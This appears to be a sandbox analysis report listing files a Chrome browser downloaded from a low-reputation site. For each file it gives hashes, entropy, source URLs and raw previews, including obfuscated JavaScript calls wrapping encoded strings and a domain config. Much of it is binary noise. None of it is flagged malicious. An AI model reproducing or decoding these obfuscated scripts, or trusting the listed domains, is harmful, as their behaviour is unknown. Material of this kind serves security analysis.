                                                                                                                                                          SHA-256:1CD3FD1C4DC4E53EE137DEA549DA60583368EBD35D616C07140EF56A97A3FCED
                                                                                                                                                          SHA-512:6DFBA668EE5FFAAC3A4014266D285556ACACECA6747B51273F38FB502FDD1977E975A61D87A524849C528CF076160900464356D5403197B9004722E988FC4882
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/240516-03/static/js/components/121/footerNav.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAHANgGYBdAGgG8A3AcwAsB5ALgDMBXNGAFwEt1MlSnUlACUVKACcABKwC85AEQA6APScAjPgAMhFUlZgAclEpKAVkgWNsCgCYAbOCoWkALIS1llajwCZfegbGphZWNiAI9Ggurr4AnF6qnB6EcYFGJuaW1gqE9gCaAIIxvriJPuru6cFZYQoAagAeAKoAGiUA7OXJmgCs1ZmhOc31AF4AoiX43YTqHbr6GSHZNvY0AGIlvTO+mgPLdSMdxW6+rjvquPu1OQCyAMoAQvQlJKTeyb74aYs1QzbcMwALWcp18M1mPyCgxWCgAkgAJBHRU7qCFxfDXf4KOIoTisEqed5JQjudRY2EAaWozQA6jF1AliT5XB1yb8YXVab4YPcGWVmclWQEOQccgAZVitAAKDK6gtJHVcFLqhAAKlB8AzpgrXLh2dCxTY1R0ES83Optrq4srRTcbAjGgh6gzztb+nbsbQ4QBHRoMt4fQi9LRaFU5QiNADC/ot4IVIaunthvgAIioAEoMtEJyrhmxxXmUBlEoO9Dz5hRaXBAzZuLRMsuzStA3AI9r1gVl1wGpb2hT2ThA3oxLTy7sLQ39+zcZqjUc67u2qfY2lR1PqUdWsv4EUr2Gp5o90dussYyu4QzMACKo8DJN6cST+7qEFub9H8aD2g6lYA4r0MCbvWObfj2lZgGAUa3KOpYkvgvS9n8sIqAAngijwuKkjbwb0e59tiQIANQQKhWFPjM+D4L+yZ1GA+CGASpCpOO8EdB6L45HChCEPSzEYpRHRQgRsJQOxzTkdu8G4BxIl1Pc3CjMW/GntJz5yTk+TcAiJypPePhsrJyF1I8tiEGY5FfiSHTaJWcTAKM1DkaB1n4EhnI5KMtgqMA5FwQZ8yVmgCLABJzG4DhAXLhp4Rwr0PpYbgXbWexlacL4zB8uFrEBcJxk5CRzQweFi4kvqYa0TkzCNPcCXhVJP
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3277
                                                                                                                                                          Entropy (8bit):7.68223520405088
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:bccinNuitNFBNeeJ3mQWQ/IW814bOLgAuWahQEGO8YUaDV2E1D3BDhY3g4UZ35MS:4NNW8IR25WKQ5O8YUO22YvS
                                                                                                                                                          MD5:01494C55C9EB698D63A918F634F4F040
                                                                                                                                                          SHA1:FA29AF59187E300D3CB0850B6461C65C777CBD30
                                                                                                                                                          SHA-256:101E350D2DA926DCAFE843885FE34A77946D1E8A20FE1C64DA8692A22AD32B6A
                                                                                                                                                          SHA-512:CF287AB75A71A29BFC9D6E955C3BE308E66B2B31E1B84A24CD01E2F9A39A4B974F1C69E86E7205311FE0B8F4892730B81D923EABCA2A1B687E4F596DC662C3C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/live_og.png
                                                                                                                                                          Preview:.PNG........IHDR.............L7.4....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c014 79.156797, 2014/08/20-09:53:02 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="uuid:17BBB51BCE49E711A809823CCFAF5CCB" xmpMM:DocumentID="xmp.did:5A43B85B211611E8A37FCD2FD4B0745A" xmpMM:InstanceID="xmp.iid:5A43B85A211611E8A37FCD2FD4B0745A" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8A809D57F77611E7B91CA8896BA0A9B2" stRef:documentID="xmp.did:8A809D58F77611E7B91CA8896BA0A9B2"/> </rdf:Description> </rdf:RDF> </x:xmpme
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, max compression, from Unix, original size modulo 2^32 33266
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):9892
                                                                                                                                                          Entropy (8bit):7.972562696318712
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:AlehYXevG1OuZAPpHaU3WabIgwkhTiROULU+YODxuc4T8VsS5o9sAPPj5KO:bhGevKOyAP59byE+ROULU+YAp44sJ9sY
                                                                                                                                                          MD5:EE68D9C22FB7B678960A7C8E00814646
                                                                                                                                                          SHA1:605D82A011BA5BD9B71D95FFF45315E92800D46F
                                                                                                                                                          SHA-256:8AF5F843E2F8DA062B7BAE2F495260FB7246FE7CD9A8730D53739F4DE1A12B0C
                                                                                                                                                          SHA-512:E6A7D7C8AC23AA11F1C895C40FDA819BACB38F431B07EC6E32B2D1F02B25DB744F17F929BB3A8FB409A507C16DEF465776E7D1F94FE648CB4FD964961F747F50
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://e933002.com/message_zh_CN.js?v=1717580749344
                                                                                                                                                          Preview:...........=kSS...W(.].......:c.=.L..}....T*...:$1'.\.[...@@QDA....Pi......9I>..f....g.W........^k....\.f.t.........dG$.M..o.X....R...............CK8.Bk1W&.-kd..{...?5..5..+....d....K.v..R[._)N...>.5.W...Va.|=[}...4.=...$R...qg.>..>.e.......Ao......W.PF..............S.....S.n=.m,..........._..C..Ju.I-.smn..x..K.B....OS.(..s.G.....m..uk._3....#....S...'..|:`....r..Mv......x....V./l................|.\yH.<.j-,.v..J..VLS.e...>un=.H.u../.....`i......a..xm...._.....CKw.f..U.v!..28m.\yS....V.aDc...x...!.N'zC.x:.5.=k..).R.\..V..f..}.`.l.\*.-.....d.[..@.f.v..0g....I.F.G.xf......f~..[.....W..9....x.x..Z.yW_.2..a....=..Z.....5......z&..@x.<6.Ek..z..$z..=3.....&...g4'.a.=p"ep8TJyk.I}y.,=m....Z<....>.+.@[~PH.o....6...&...h.............8?p....5.6...V.....=.Y..}..'...gW..8...+....mA..Lc..)G..x2nt).!.V.w..'.........oM..ry4...,..p4.I..h&+[.N...v..*.';..+.T.C.%.BC..Z.....S:....D..G.st.h.R...z.^i.K......d-..@.!?p .0p..F.k.`.uL.M$.1....A...n}8
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):19634
                                                                                                                                                          Entropy (8bit):7.963184945669312
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:GQmYc2gqyEc+Ya0YgdNnx6g5LVW7DZ6/VUlOz0ouU0If1H9MwVlJyFR3ZqmeFliO:GQmYYqdc175dVx6gU7oZ7df1H9M5dFe3
                                                                                                                                                          MD5:1D8F3EE8FF9C810124A834D133E23195
                                                                                                                                                          SHA1:FC6D0D17A984C58E60CB1E7490FD8C730A972197
                                                                                                                                                          SHA-256:620E1BDF3C26704F4070CEED466065CFE6AE105D64F8EA11F1E619F1980E8BC6
                                                                                                                                                          SHA-512:CB8C7FBBF43568AD0FFC76B7CBB831CAFEED921B7DC3ED80960C7524B5DFA504F50E51588602EB84A4BBBABBD0A4ABFCA9608CB7374F929E400161B6BFBC8837
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BDA0C9878D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BDA0C9868D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (712), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):712
                                                                                                                                                          Entropy (8bit):5.64801005849234
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:4chWT/FnERqhW8f+Orb40ZltTvtLkSVuGH6mjlzsknHlXlYkzj6K9UmkgtQa5:VIFnOCW8f+Orb4OHZ31H689lJv62p5
                                                                                                                                                          MD5:A7B8C47096444F4265695D690ABEBC27
                                                                                                                                                          SHA1:3C666C80EDEF8069BC8E33ACC32C814D6BF61B85
                                                                                                                                                          SHA-256:BA268D652949501172DFA52050A4B14694AE41CBF1B4728EB118A0B5D87533D2
                                                                                                                                                          SHA-512:C5F2579E0CF410AD7D570F06D0C57D5B58AF2D950E8A68C7E4108DBA9B1FC05FB9F231AFDA4448C171F86FDFC8FD9C975384BC70D5380E073868CFA23E8D160D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/t4043-subNav-js.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAzAFnwF0AaAbwC1gBNALwC4AzAVzRgBcBLdTEEtEuwCUZAETMkIAARJ2AJ04dRAbgDyYAFYgOAOgAmIRpzQgACnJQQQc9gE9MA0QH0nIJAFkUe5gBsQo8gA3KB9mEHoAQgAGAF8hQX0HElEAWxA0ZgAZTlkAljYuHhE5EHZmOTQpGDiEvSTRdksASRSAczzWDm40TGLS8sqUGvZExzAUdkaUlvaSfK6ishKyiqk5OOVguSqAXiXW+jIYAAt6UUAseUANFUALm0AYxQD0s9EYkigwQ5OzwGdFQDi5QEQjQA3cg80Gc3ihmOwpBJniQYCgPqdRIAVAMAO36A4FnOFodiwSHQl7QBFnQDHcoAwF0A8sqAOuiMaINIEpFBWul2DDgHoiaJAEGagFV5QAa2oA+axpxxQwCkjSkBggKCQnBZLz0cg5PMAa8qCkiPUTC0XikowECcQL+AnvI6IwAceoBByMAd6mADIyaXCUil0FIIBYwH4UjC5EgOYBiWMA33KALWVAJb6NLApS4aHaLzkPg5VMAcHKAEcjAJhKNMZJRAaWxDLQejWvjcMIgnA5gAS0wCDnoAHjUAcGY010G2C2F0oHyKWwwkIcwAQKoBSELJNICOLAABUQAAPdhnPuATtNAPD6ncVppJpLug5iLxQO1EATk2+eGyAA=")
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2026
                                                                                                                                                          Entropy (8bit):6.550833124518682
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:w/6NVd6V4knA9WIb102t0/3LwXj3E3HSy30ZYHlxtvjyznpqWRN:wSJlknmWIbD63sg3HSoHlPvunH
                                                                                                                                                          MD5:5E50D4E76B0014CC5521DAE3EEE4CDB8
                                                                                                                                                          SHA1:8EBE887A860F0CC896078FE1AC5CCBFC1057A529
                                                                                                                                                          SHA-256:3DC953ADC1D90DE566B011CCE2A3DE7B1EFBFD5F9F93E82C3CEDEF0E5C91F6DD
                                                                                                                                                          SHA-512:058176ADFF4BE9FD7BD05825546BC0C43B3F322D343288165D912365AC3F3C10E347AA6EF682F46C5C3B7E951CD336BE7168F008E5147E78A168C4B89A39A8C4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/live_evo-i_w.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be9, 2021/12/08-19:11:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 23.2 (Windows)" xmp:CreateDate="2022-08-12T11:41:49+08:00" xmp:ModifyDate="2022-08-12T11:47:34+08:00" xmp:MetadataDate="2022-08-12T11:47:34+08:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:9c358eab-39e0-a54c-99ae-0692b5390b5a" xmpMM:DocumentID="adobe:docid:photoshop:b387ea0c-2c61-f045-9e1c-ef5c35f3f642" xmpMM:OriginalDocumentID="xmp.did:0ac9fd
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):18388
                                                                                                                                                          Entropy (8bit):4.351571195978757
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:sPrmmNeqmORafrtTThDeJ+GgJttHVENDYXdk0hfbwSr:0rmFORstThDeJtgJtFVENMXdkMBr
                                                                                                                                                          MD5:AB2CBE8957927CF9923F1435AA517BC8
                                                                                                                                                          SHA1:C1F5439091C7914EE2E65D8E9E4DC31A17327AEC
                                                                                                                                                          SHA-256:36BFC70E4B7D8EE7D2C3687C8F704AE2021A8F1F61FF31AD71C6227C602391D7
                                                                                                                                                          SHA-512:9A51747CC8D842CDF60CD433964529A5CBDD02E83D2972D8059B5935F7EF912757FF4461E757B5F662195F22A86B65F7969151BF9DAA303B5F55FF483C6C6266
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://ocsapi1961.hydqef.com/ocs/zbw?r=7649153494
                                                                                                                                                          Preview:{. "nnn": "outer-888",. "versions": {. "zb_m": "240606-01",. "zb_pc_member": "240529-01". },. "http": {. "CDN_PATHS": ["zb-qq.gzjqwlkj.com","zb1-hw.qectyoua.com","zb-hw.czwygs.com"],. "API_DOMAINS": ["ocsapi-lc.tingmeikj.com","ahd-ocssn.qqxgo.com","wssa-341.dalianjrkj.com:1585","ocsapi-aws.huayidm.com","wssa-381.moceand.com:1985"]. },. "https": {. "CDN_PATHS": ["zb-qq.gzjqwlkj.com","zb1-hw.qectyoua.com","zb-hw.czwygs.com"],. "API_DOMAINS": ["ocsapi-lc.tingmeikj.com","ahd-ocssn.qqxgo.com","wssa-341.dalianjrkj.com:1586","ocsapi-aws.huayidm.com","wssa-381.moceand.com:1986"]. },. "public_domain": ["cppublbyv2-ali.epie3d.com", "cppublbyv2-hw.zjbxxy.com", "cppublbyv2-ty.huliancc.com"],. "gb_app_ins_domains": ["appiso-ty.souzhanzx.com:1066", "appiso-ty.zvbzjsb.com:8066"],. "gb_plist_api_domains": ["qpplist.lcyj888.com"],. "gb_wx_proxy": "https://wy-ali.meriksenrusso.com",. "gb_disabled_proxy": true,. "gb_is_pc_sp
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (744), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):744
                                                                                                                                                          Entropy (8bit):5.7188843771110305
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:4chWc24cP6xCerN8InAqhFPm+fXWI2w2AEj6rBgvPLJ16MdCxWEfjDZXs:VrcPG5zAyGImAE9j5d7j
                                                                                                                                                          MD5:8C9536C2B5447F08EB01458E72662616
                                                                                                                                                          SHA1:44F22CA724DBBD3ED30AE52DF331788929028521
                                                                                                                                                          SHA-256:16A0C277C975BD7B90F345A0030389DDC281D16FB9443033CE2757E59CC672E7
                                                                                                                                                          SHA-512:6B769B899BD3DE1C9B9226B824F11099C72C04C62EB78450B6FE63C9414A58D2F14683A1DBC3B98AEAEC87F3E1FFCD5F88150C148FE1061484004B709C4B66EF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/240516-03/static/js/components/partnerList.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATATgBYBdAGgG8AiAITgGoAXSgLgDMBXNGBgS3Uwak0pEAEoq7JCAAESBgCce3SgG4A8mABWIbgDoAJiFY80IAAryUEEPIYBPTMMoB9ZyCQBZFPvYAbEJQUAG5QvuwgzACEAAwAvqIqIfLS8gC8IJiU0TAQrJSipDyp5PpQDFBsnNx8aJji8iAM7PJo5DD6aGZlABbM8gZGUH4MugDC6HJQaCPtaAASKHKk0Lam8gAyPHLM2MSxsaQwKAC2EOwMIPrM5AcwDWWXlVy8/OJJ0gypDN1bQqnAJn0KGAugAygBpACSADkVBlKABGACCmgA5vlMroAPSUOhoOiULGAkAAD10miQ+V03xAtQ4zxqjnEIxWDDWmzkqTQulZ7K2DHi+1ISGKDTQhnkT2qr3I70+3y2ugAJHcQA8AKL+Y60wRoL4/JC6ZxSXysI0wAA+FoYKgaTRa0lqlH0PCCgXIk14MFGvigSCQzEorBQKAu8gAtLybBymAcFYbnL4BAaeVBVtH+aR6dLagx6o1mmhHZkXW6KDBff7mALRPFa8Lyl6AEq0iUAMTQAd2sUSaekUHSmQAagBVLEADgxPGFpEiCKzVReufE8N8AC8jPkRJl1ghfJD8gdnWUoOGguGYABWS8ANhg+BAN8CaD8vgS3MMrCGvk+UF0pIgFBbCQA5d33KUlwEIRxAOdcjAgxldRg+IVCAA")
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):316994
                                                                                                                                                          Entropy (8bit):5.349542251999496
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:fn1klIkhkKbGUXb+/X5K4qzyutwTw8PG4NYhvUQHoXO0H0BWVPMbj:fnuhhkZy+cYutwE8PG4GOQIF0BWVPU
                                                                                                                                                          MD5:27E34DE2F2296D64B3F5BF4FFCA0E4AA
                                                                                                                                                          SHA1:947C048AD208F8C9962470E6664B0D383A2D6694
                                                                                                                                                          SHA-256:41F75723A62FF6132D037855E2AA24A033224327EB266DB175E87F07020D2678
                                                                                                                                                          SHA-512:DC994D4040277FC76F6D21656E893211A5BAA0CBEC7B1D2295184E8A26401C49A99418F5FA44FDF040FF2E903FFD3470D9573C5FF07C65F4B2855D131EAC0875
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/public/vendor.dll.js
                                                                                                                                                          Preview:var vendor_library=function(t){function e(r){if(n[r])return n[r].exports;var i=n[r]={i:r,l:!1,exports:{}};return t[r].call(i.exports,i,i.exports,e),i.l=!0,i.exports}var n={};return e.m=t,e.c=n,e.d=function(t,n,r){e.o(t,n)||Object.defineProperty(t,n,{configurable:!1,enumerable:!0,get:r})},e.n=function(t){var n=t&&t.__esModule?function(){return t.default}:function(){return t};return e.d(n,"a",n),n},e.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},e.p="",e(e.s=9)}([function(t,e,n){"use strict";function r(t){return"[object Array]"===O.call(t)}function i(t){return"[object ArrayBuffer]"===O.call(t)}function o(t){return"undefined"!=typeof FormData&&t instanceof FormData}function a(t){return"undefined"!=typeof ArrayBuffer&&ArrayBuffer.isView?ArrayBuffer.isView(t):t&&t.buffer&&t.buffer instanceof ArrayBuffer}function u(t){return"string"==typeof t}function s(t){return"number"==typeof t}function c(t){return void 0===t}function l(t){return null!==t&&"object"==typeof t}function f
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 14857
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):4126
                                                                                                                                                          Entropy (8bit):7.9584178336988485
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:YK+LFVnC8QaQV08CIFufD2xOx/mpTWTjvwCnxdBOTi:l+LFzh5r2xymVW/wmr
                                                                                                                                                          MD5:E760677F4C48D9F9E8B95EF4B6F87FA8
                                                                                                                                                          SHA1:1E8731B8C43003B65A5E7132D6E51D1E991EB125
                                                                                                                                                          SHA-256:3E6115C7F94633F37AA0482064FF05299010E6B7D36B3EE8698389F83F5536C9
                                                                                                                                                          SHA-512:1EBB5B6C821891EB74621CB973705D6B61CC3792823080FE7BA869BB1C0DC18818E6CA84F38F7C1D601A047B11D34E64AA554093430904DD9789A600AC1D0487
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://8vpfnx.eveday.me/061410/rcenter/common/js/gamebox/common/jquery.validate.extend.msites.js
                                                                                                                                                          Preview:.............r.6.Ul.+..EKv.&.iO.8Mf...z?$.CI.."..r..".,.N......R.]....8O.....b....d...0..I0...Y..;.].d.7..0...[..j4.....g.g..a).[.._.(......bY.(.+.f..#.:Ea....z.I..Q.:..O"..`..U*.e....E...}.......h.Z.......O..^&..b.,.<.W"M..2.....Y..;..^..R.e/D..v...d..e~......8'.s..8I.......'.a..bl.0s....8.\....0...\lL..5.=y.g.h.Vx.h wO..B.E+Yz>.U#.jm/...6[..a...z-..F@?..d.h..V*....I...e.fq.?..s..uQ..r4...*ASiz...%.l.t..."...M...,...p.>c:....$.5M...r.....v.g;.M...b.+Z/..rpR...A.y3.-Z.(...1T...y.~)..!.K...`<6.Ri.$TO...bs.u.H..|.8.M....E(.)...R..,..3 ^gS.........#J+"^.......J3.9 Z...B.c.c...@.e<......9.).q..n......W.J..i.I.A.z...yd...O..P>..|..b!.q..&~.....y..Xd0.......V...m.......d...:.F.C.#.\].O.y..fX.i...^.....#MAXP_..F..ow.3.J.....k....q.>`..p..uA.w*....$....D.......Y$.<]J#..8?d....F....#..V3lZ..r............mg5LE.k5Hq.:P).....-..daP._..W. [x..2&e.:.E%..9.......[9...`.&..3..oo..+]..i8....C..V..hc$.Y...........^.......v....C&2N1..4.NEj..`. w....2....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://wssa-301.shiwanxin.com:1186/ocs/cc.png?1717972890349
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1740), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1740
                                                                                                                                                          Entropy (8bit):5.863746419169325
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:VE9RvUBzEM5vmLi6gtlM/E307UJsswEwNX85oVbR:VE9RQBmu6gtC77UQNX5bR
                                                                                                                                                          MD5:D41604EED8C01D725D5082FD2039463B
                                                                                                                                                          SHA1:D9843674196CFD4C67E247927C78CD58BFB38094
                                                                                                                                                          SHA-256:5B8264FD10F490EFF4AC621CE175CFD0CE511CFB34A556BCF760B0759499AA8D
                                                                                                                                                          SHA-512:4BC476EAA3CE2FDB70054AD701062AD3E61B10F15780557DC383047313A0777D16791E002150EFAA875300B4B640236020E6D69F04420A79959919AC68CA1A2B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/240516-03/static/js/components/bonus.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZgHYAmAXQBoBvAVQCUBNALwC4AzAVzRgBcBLdTN3K8AlJQC+5AE4BzAJwBPNpx780g4eRRiAROyQgABEm5TePHQG4A8mABWIHgDoAJiFa80IAApSUEECluBUxech0AfQiQJABZFBd2ABsQHSoANygk9hBmAEIABnERS0ypQzQAXhRMHQARFwAOYB0RchBqp3U0NqRq2oKYCFZW6X6dADl6AA9rUfZKzBBMEUwJclsHHkwpJwBbKAgAcRBubkCkVewdXiQAGRQZTzSdMHR9XxQ929TSNsoZKcJihgAAVXh7XIcLh8ARiKSndhSNCGbgAC1uTm4KAAQnZwZDBBikE4YCh2BB0ABJNCsFBOExQIIEkAiADUOkMAD9DIAG50AFOo6cTFKguKDcKDKGFqFaUBHcJFoShkinU2koZjrW4ACU83AAymiQflcMIkHVTlBeElDca8rhheRgOKYGjNbcHk80FLVAJuGJuAB+dGYwHcADC5MpaBpdJWzCJmJ1ettwEq9vIIZJtwtEutqfTuBEkjeaA+fm+Bh9sPU/soZUMvEqWcs3AAZG3uFi0SB1NDfbWA05An4pIGSW5WFBkl3qHwkk4soFuAB1JloTwyQTDqSj/YxJBQQEiZi4SrNpwIpAzpy3HGeFyR9jedD6058NAyDtdq837ESpInxfNAAEE9nJNAg1CW8kF1SCC0KYRSSjNU6QvX8kn9BNeBguCDSNNMMxwnNLXzAjCyQlVo1jFB0JiGdi2LSQyT2CB2HOFxmGWVZ1k2RxuB2fZDhOM4LiuG57keZ5wlLcsvh+HQ/ioMNgTBCEoRUGtZXlRVUWJLFcXxdTExJKjUPpRlmXU9lOR5AUhRFSF0QSJBNTDJ9qPVasZTEEyYM9TwAB9AqzGDvBXERv30gASEwUARZC9m+ASdH1ABRUEIhxawJmofVvFoaxYipdK0gndxp0wpwQIgXg3y
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):15676
                                                                                                                                                          Entropy (8bit):7.95677851421634
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:trkksoIK3AL/H1VPrpeCm4uR72goHW11m71bmrvF:trDI0eH1VFeCm4E7IW14YrvF
                                                                                                                                                          MD5:E9D6F1F9FE9BD1A84D160111A694055B
                                                                                                                                                          SHA1:CAEAA79A384502FB99A1ECDC935F484415C025F7
                                                                                                                                                          SHA-256:2D45AA957F5D5C9D8B607977301737CBEC92E1A5BC21EA5C52001E3DC71796E3
                                                                                                                                                          SHA-512:9E044E7AC8DA66289449E26DF7FE3DA44739B37CBBCE9103061750D1760131F9C2297A9DE6FE22869FE16557A283C2EC86676DC312C06A240D6C4AF371FDE973
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
